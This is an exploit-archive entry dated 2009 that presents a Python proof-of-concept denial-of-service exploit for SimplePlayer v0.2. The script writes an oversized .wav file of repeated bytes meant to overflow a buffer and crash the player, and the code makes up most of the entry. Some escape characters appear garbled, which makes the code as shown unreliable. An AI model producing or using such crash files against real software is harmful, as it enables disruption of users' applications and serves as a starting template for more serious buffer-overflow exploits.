id: 9814
date: 12/31/2009
title: SimplePlayer v0.2 0day (.wav) overflow DOS Exploit
author: mr_me
cves: 

==================================================
SimplePlayer v0.2 0day (.wav) overflow DOS Exploit
==================================================


# Title: SimplePlayer v0.2 0day (.wav) overflow DOS Exploit
# CVE-ID: ()
# OSVDB-ID: ()
# Author: mr_me
# Published: 2009-12-31
# Verified: yes

view source
print?
#!/usr/bin/python
#
# Title: SimplePlayer v0.2 0day (.wav) overflow DOS Exploit
# Found by: mr_me (seeleymagic [at] hotmail [dot] com)
# Greetz to: Corelan Security Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT
# Tested on: Windows XP SP3
# Happy New Year!
#
# POC:
 
crash = ("x41" * 36000);     # overwrite the buffer at 262 bytes
try:
     file = open('mr_me_dos.wav','w');
     file.write(crash);
     file.close();
     print "[+] Created mr_me_dos.wav file"
except:
     print "[-] Error cant write file to systemn";



#  0day.today [2023-03-24]  #